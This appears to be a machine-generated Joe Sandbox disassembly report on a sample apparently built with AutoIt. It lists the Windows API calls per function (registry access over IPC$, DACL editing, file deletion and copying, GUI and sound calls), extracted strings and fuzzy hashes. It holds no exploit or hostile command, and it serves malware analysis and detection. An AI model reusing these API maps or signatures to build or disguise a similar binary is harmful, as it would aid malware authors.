                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00EBE5F5
                                                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 00EBE619
                                                                                                                        • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00EBE644
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00EBE66C
                                                                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00EBE682
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3840717409-0
                                                                                                                        • Opcode ID: bfbaef7b3f14557a0f4965d8bd6a54c64c6f65039e9c267a928990122542542f
                                                                                                                        • Instruction ID: e765d4824162c45d42d35666f5555465338f9e67a547b499f8307ea625d5bd98
                                                                                                                        • Opcode Fuzzy Hash: bfbaef7b3f14557a0f4965d8bd6a54c64c6f65039e9c267a928990122542542f
                                                                                                                        • Instruction Fuzzy Hash: B5417975602204AFCB219F66EC88EEBBBB8FF89715F108059F906E7260D7319D04CB60
                                                                                                                        APIs
                                                                                                                        • __wsplitpath.LIBCMT ref: 00EA0C93
                                                                                                                        • _wcscat.LIBCMT ref: 00EA0CAB
                                                                                                                        • _wcscat.LIBCMT ref: 00EA0CBD
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00EA0CD2
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA0CE6
                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00EA0CFE
                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00EA0D18
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00EA0D2A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 34673085-438819550
                                                                                                                        • Opcode ID: 52263f8f626f9a5f97c42b19ac165023857cabc9ffa0f5513fad60a98f7c9d27
                                                                                                                        • Instruction ID: e97b7a60a025234c55d9350fb1b26914f1e03620e98d3aaaf42b265d92a26e67
                                                                                                                        • Opcode Fuzzy Hash: 52263f8f626f9a5f97c42b19ac165023857cabc9ffa0f5513fad60a98f7c9d27
                                                                                                                        • Instruction Fuzzy Hash: 5981A4725043059FCB24DF64C844AAAB7E8BB8E314F14992EF985EB251E730FD85CB52
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E6AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00E6AF8E
                                                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00EBED0C
                                                                                                                        • GetFocus.USER32 ref: 00EBED1C
                                                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 00EBED27
                                                                                                                        • _memset.LIBCMT ref: 00EBEE52
                                                                                                                        • GetMenuItemInfoW.USER32 ref: 00EBEE7D
                                                                                                                        • GetMenuItemCount.USER32(00000000), ref: 00EBEE9D
                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00EBEEB0
                                                                                                                        • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00EBEEE4
                                                                                                                        • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00EBEF2C
                                                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00EBEF64
                                                                                                                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00EBEF99
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 1296962147-4108050209
                                                                                                                        • Opcode ID: 47684d001f803846810415fafb5bd6e4f5dd33624e171129401d40986a9d1a7e
                                                                                                                        • Instruction ID: 4302031d7ccad827bc449811e7614fa01076e1ce9156445c1c0bffb76984d66d
                                                                                                                        • Opcode Fuzzy Hash: 47684d001f803846810415fafb5bd6e4f5dd33624e171129401d40986a9d1a7e
                                                                                                                        • Instruction Fuzzy Hash: 77817D71208301AFD710DF15D884AEBBBE5FB88358F00592EFA99A7391D770D905DBA2
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E8B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00E8B903
                                                                                                                          • Part of subcall function 00E8B8E7: GetLastError.KERNEL32(?,00E8B3CB,?,?,?), ref: 00E8B90D
                                                                                                                          • Part of subcall function 00E8B8E7: GetProcessHeap.KERNEL32(00000008,?,?,00E8B3CB,?,?,?), ref: 00E8B91C
                                                                                                                          • Part of subcall function 00E8B8E7: HeapAlloc.KERNEL32(00000000,?,00E8B3CB,?,?,?), ref: 00E8B923
                                                                                                                          • Part of subcall function 00E8B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00E8B93A
                                                                                                                          • Part of subcall function 00E8B982: GetProcessHeap.KERNEL32(00000008,00E8B3E1,00000000,00000000,?,00E8B3E1,?), ref: 00E8B98E
                                                                                                                          • Part of subcall function 00E8B982: HeapAlloc.KERNEL32(00000000,?,00E8B3E1,?), ref: 00E8B995
                                                                                                                          • Part of subcall function 00E8B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E8B3E1,?), ref: 00E8B9A6
                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E8B5F7
                                                                                                                        • _memset.LIBCMT ref: 00E8B60C
                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E8B62B
                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00E8B63C
                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00E8B679
                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E8B695
                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00E8B6B2
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E8B6C1
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00E8B6C8
                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E8B6E9
                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 00E8B6F0
                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E8B721
                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E8B747
                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E8B75B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3996160137-0
                                                                                                                        • Opcode ID: 583168eb8fbe2ee3ec997bc70205a4eb881ea0abeaf928b754b6ac568d761dc4
                                                                                                                        • Instruction ID: aeaeeb3fb593d2669f2e7f4076ffa7d1ee7c81e13415c2b22b018dd70929d2b6
                                                                                                                        • Opcode Fuzzy Hash: 583168eb8fbe2ee3ec997bc70205a4eb881ea0abeaf928b754b6ac568d761dc4
                                                                                                                        • Instruction Fuzzy Hash: 30514DB5900209AFDF04AFA5DC45EEEBBB9FF45314F04816AF919B72A0D7319A05CB60
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(00000000), ref: 00EAA2DD
                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00EAA2E9
                                                                                                                        • CreateCompatibleDC.GDI32(?), ref: 00EAA2F5
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00EAA302
                                                                                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00EAA356
                                                                                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00EAA392
                                                                                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00EAA3B6
                                                                                                                        • SelectObject.GDI32(00000006,?), ref: 00EAA3BE
                                                                                                                        • DeleteObject.GDI32(?), ref: 00EAA3C7
                                                                                                                        • DeleteDC.GDI32(00000006), ref: 00EAA3CE
                                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 00EAA3D9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                        • String ID: (
                                                                                                                        • API String ID: 2598888154-3887548279
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00E95FF5
                                                                                                                        • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00E96082
                                                                                                                        • GetMenuItemCount.USER32(00F118F0), ref: 00E9610B
                                                                                                                        • DeleteMenu.USER32(00F118F0,00000005,00000000,000000F5,?,?), ref: 00E9619B
                                                                                                                        • DeleteMenu.USER32(00F118F0,00000004,00000000), ref: 00E961A3
                                                                                                                        • DeleteMenu.USER32(00F118F0,00000006,00000000), ref: 00E961AB
                                                                                                                        • DeleteMenu.USER32(00F118F0,00000003,00000000), ref: 00E961B3
                                                                                                                        • GetMenuItemCount.USER32(00F118F0), ref: 00E961BB
                                                                                                                        • SetMenuItemInfoW.USER32(00F118F0,00000004,00000000,00000030), ref: 00E961F1
                                                                                                                        • GetCursorPos.USER32(?), ref: 00E961FB
                                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 00E96204
                                                                                                                        • TrackPopupMenuEx.USER32(00F118F0,00000000,?,00000000,00000000,00000000), ref: 00E96217
                                                                                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00E96223
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3993528054-0
                                                                                                                        APIs
                                                                                                                        • LoadStringW.USER32(00000066,?,00000FFF), ref: 00E9D567
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                        • LoadStringW.USER32(?,?,00000FFF,?), ref: 00E9D589
                                                                                                                        • __swprintf.LIBCMT ref: 00E9D5DC
                                                                                                                        • _wprintf.LIBCMT ref: 00E9D68D
                                                                                                                        • _wprintf.LIBCMT ref: 00E9D6AB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                        • API String ID: 2116804098-2391861430
                                                                                                                        APIs
                                                                                                                        • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00E9D37F
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00E9D3A0
                                                                                                                        • __swprintf.LIBCMT ref: 00E9D3F3
                                                                                                                        • _wprintf.LIBCMT ref: 00E9D499
                                                                                                                        • _wprintf.LIBCMT ref: 00E9D4B7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                        • API String ID: 2116804098-3420473620
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E57E53: _memmove.LIBCMT ref: 00E57EB9
                                                                                                                        • _memset.LIBCMT ref: 00E8AF74
                                                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00E8AFA9
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00E8AFC5
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00E8AFE1
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00E8B00B
                                                                                                                        • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00E8B033
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E8B03E
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E8B043
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                        • API String ID: 1411258926-22481851
                                                                                                                        APIs
                                                                                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EB2AA6,?,?), ref: 00EB3B0E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharUpper
                                                                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                        • API String ID: 3964851224-909552448
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E57E53: _memmove.LIBCMT ref: 00E57EB9
                                                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00E9843F
                                                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00E98455
                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E98466
                                                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00E98478
                                                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00E98489
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: SendString$_memmove
                                                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                        • API String ID: 2279737902-1007645807
                                                                                                                        • Opcode ID: b8177b7504c1bc7808b267b87ffa2fdfdca17c5ade36ab8a29ad1f84c136c69c
                                                                                                                        • Instruction ID: aeceea1e5552cd102f269c8e57dd3fc0925881b0d8dbea62e27337d15614394d
                                                                                                                        • Opcode Fuzzy Hash: b8177b7504c1bc7808b267b87ffa2fdfdca17c5ade36ab8a29ad1f84c136c69c
                                                                                                                        • Instruction Fuzzy Hash: F111EB6164015D79D710B7A1DC46DFF7BBCEFD2B00F04581A7811B20D0DEA04E08D5B1
                                                                                                                        APIs
                                                                                                                        • timeGetTime.WINMM ref: 00E9809C
                                                                                                                          • Part of subcall function 00E6E3A5: timeGetTime.WINMM(?,7694B400,00EC6163), ref: 00E6E3A9
                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 00E980C8
                                                                                                                        • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 00E980EC
                                                                                                                        • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00E9810E
                                                                                                                        • SetActiveWindow.USER32 ref: 00E9812D
                                                                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00E9813B
                                                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00E9815A
                                                                                                                        • Sleep.KERNEL32(000000FA), ref: 00E98165
                                                                                                                        • IsWindow.USER32 ref: 00E98171
                                                                                                                        • EndDialog.USER32(00000000), ref: 00E98182
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                        • String ID: BUTTON
                                                                                                                        • API String ID: 1194449130-3405671355
                                                                                                                        • Opcode ID: f960e5064acdb009071779e55e6e2b5ebac62d60560d5344c2ea2a6546270103
                                                                                                                        • Instruction ID: 162f628d91a732cfd796afce7f0b336206419d4f2a6284aa4476a0deaaadf22f
                                                                                                                        • Opcode Fuzzy Hash: f960e5064acdb009071779e55e6e2b5ebac62d60560d5344c2ea2a6546270103
                                                                                                                        • Instruction Fuzzy Hash: 9721C370205208FFEB229B32FD89AA63B6AF75638CF055126F411B2271CF768D09A750
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00EC3C64,00000010,00000000,Bad directive syntax error,00EEDBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 00E932D1
                                                                                                                        • LoadStringW.USER32(00000000,?,00EC3C64,00000010), ref: 00E932D8
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                        • _wprintf.LIBCMT ref: 00E93309
                                                                                                                        • __swprintf.LIBCMT ref: 00E9332B
                                                                                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00E93395
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                        • API String ID: 1506413516-4153970271
                                                                                                                        • Opcode ID: 1438062df67f85f1e9d2114f0d01032627e88d59c508a1f6ccc47d27e6941b3e
                                                                                                                        • Instruction ID: 9169aeef842f4a3c176cda08e209efa8735db1537585bef95c42340076f14d81
                                                                                                                        • Opcode Fuzzy Hash: 1438062df67f85f1e9d2114f0d01032627e88d59c508a1f6ccc47d27e6941b3e
                                                                                                                        • Instruction Fuzzy Hash: 44214F3184421AFBDF12EFE0CC4AEEE7779FF14701F009456B915B10A2EA71AA58EB51
                                                                                                                        APIs
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                        • String ID: 0.0.0.0
                                                                                                                        • API String ID: 208665112-3771769585
                                                                                                                        • Opcode ID: ba1c1138ef3613081258a845ec34bdcf6c03c8a5a641073fc144d2049a1a804c
                                                                                                                        • Instruction ID: e79819bea95efc026d92713427fc588199c9b9615bdeddfc7c6e6e9820ee2d30
                                                                                                                        • Opcode Fuzzy Hash: ba1c1138ef3613081258a845ec34bdcf6c03c8a5a641073fc144d2049a1a804c
                                                                                                                        • Instruction Fuzzy Hash: FD11E731908115AFDF24A774AC45EDE77ACDF81724F0150A6F589B6091EF70DA898660
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E9C6A0: __time64.LIBCMT ref: 00E9C6AA
                                                                                                                          • Part of subcall function 00E541A7: _fseek.LIBCMT ref: 00E541BF
                                                                                                                        • __wsplitpath.LIBCMT ref: 00E9C96F
                                                                                                                          • Part of subcall function 00E7297D: __wsplitpath_helper.LIBCMT ref: 00E729BD
                                                                                                                        • _wcscpy.LIBCMT ref: 00E9C982
                                                                                                                        • _wcscat.LIBCMT ref: 00E9C995
                                                                                                                        • __wsplitpath.LIBCMT ref: 00E9C9BA
                                                                                                                        • _wcscat.LIBCMT ref: 00E9C9D0
                                                                                                                        • _wcscat.LIBCMT ref: 00E9C9E3
                                                                                                                          • Part of subcall function 00E9C6E4: _memmove.LIBCMT ref: 00E9C71D
                                                                                                                          • Part of subcall function 00E9C6E4: _memmove.LIBCMT ref: 00E9C72C
                                                                                                                        • _wcscmp.LIBCMT ref: 00E9C92A
                                                                                                                          • Part of subcall function 00E9CE59: _wcscmp.LIBCMT ref: 00E9CF49
                                                                                                                          • Part of subcall function 00E9CE59: _wcscmp.LIBCMT ref: 00E9CF5C
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E9CB8D
                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00E9CC24
                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00E9CC3A
